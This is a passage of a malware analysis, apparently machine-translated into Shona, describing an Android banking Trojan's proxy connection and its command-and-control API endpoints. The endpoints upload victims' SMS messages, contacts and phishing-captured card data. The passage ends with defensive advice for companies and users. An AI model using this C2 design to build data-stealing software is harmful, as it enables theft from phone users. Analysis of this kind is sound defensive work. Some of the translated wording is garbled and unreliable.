- Makirasi maviri anotora chikamu mukuita proxy: ProxyConnection ΠΈ magumo. Paunenge uchigadzira kirasi ProxyConnection kubatanidza kukero ProxyConfigClass.host: ProxyConfigClass.proxyPort uye kupfuudza chinhu cheJSON:
{
"id":<%connectionId%>
}Mukupindura, sevha inotumira SOCKS5 meseji ine kero yevhavha iri kure iyo kubatana kunofanirwa kusimbiswa. Kudyidzana neserver iyi kunoitika kuburikidza nekirasi magumo. Iyo yekubatanidza setup inogona kumiririrwa schematically sezvinotevera:
Network kusangana
Kudzivirira kuongororwa kwetraffic netiweki sniffers, kudyidzana pakati peCnC server uye application inogona kuchengetedzwa uchishandisa SSL protocol. Yese data yakafambiswa kubva uye kuenda kune server inoratidzwa muJSON fomati. Iyo application inoita zvinotevera zvikumbiro panguva yekushanda:
- http://<%CnC%>/api/v1/set_state.php - mhedzisiro yekuraira kwekuraira.
- http://<%CnC%>/api/v1/get.php - kugamuchira murairo.
- http://<%CnC%>/api/v1/load_sms.php - kurodha mameseji eSMS kubva kune ine hutachiona.
- http://<%CnC%>/api/v1/load_ab.php - kurodha rondedzero yevanobatika kubva kune ine hutachiona mudziyo.
- http://<%CnC%>/api/v1/aevents.php -chikumbiro chinoitwa kana uchigadziridza maparamendi ari mufaira rekuda.
- http://<%CnC%>/api/v1/set_card.php - kurodha data rakawanikwa uchishandisa phishing hwindo rinoita seGoogle Play Market.
- http://<%CnC%>/api/v1/logs.php - kurodha data regi.
- http://<%CnC%>/api/v1/records.php -kurodha data yakawanikwa kuburikidza ne phishing windows.
- http://<%CnC%>/api/v1/set_error.php - kuzivisa kukanganisa kwakaitika.
kurumbidza
Kuti vadzivirire vatengi vavo kubva mukutyisidzirwa kweTrojans nhare, makambani anofanirwa kushandisa mhinduro dzakakwana dzinovatendera kutarisa nekudzivirira kuita kwakashata pasina kuisa imwe software pamidziyo yemushandisi.
Kuti uite izvi, siginecha nzira dzekuona nhare dzeTrojan dzinoda kusimbiswa nehunyanzvi hwekuongorora maitiro emutengi uye mashandisirwo acho. Kudzivirirwa kunofanirwawo kusanganisira basa rekuzivikanwa kwemudziyo uchishandisa tekinoroji yezvigunwe zvedhijitari, izvo zvinoita kuti zvikwanise kunzwisisa kana account iri kushandiswa kubva kune atypical mudziyo uye yatowira mumaoko eanobiridzira.
Chinhu chakanyanya kukosha ndechekuwanikwa kwekuongororwa kwemuchinjiko, izvo zvinobvumira makambani kudzora njodzi dzinomuka kwete chete paInternet, asiwo panhare mbozha, semuenzaniso, mukunyorera kubhengi nhare, kutengeserana necryptocurrencies uye chero vamwe kupi. kutengeserana kunogona kuitwa.
Mitemo yekuchengetedza yevashandisi:
- usaise zvikumbiro zvenharembozha ine Android OS kubva kune chero masosi kunze kweGoogle Play, teerera zvakanyanya kune kodzero dzakakumbirwa nechikumbiro;
- gara uchiisa Android OS inogadziridza;
- teerera kune kuwedzerwa kwemafaira akatorwa;
- usashanyire zviwanikwa zvinofungirwa;
- Usadzvanya pane zvinongedzo zvakagamuchirwa muSMS meseji.
Starring Semyon Rogacheva, junior nyanzvi mukutsvagisa malware paBoka-IB Computer Forensics Laboratory.
Source: www.habr.com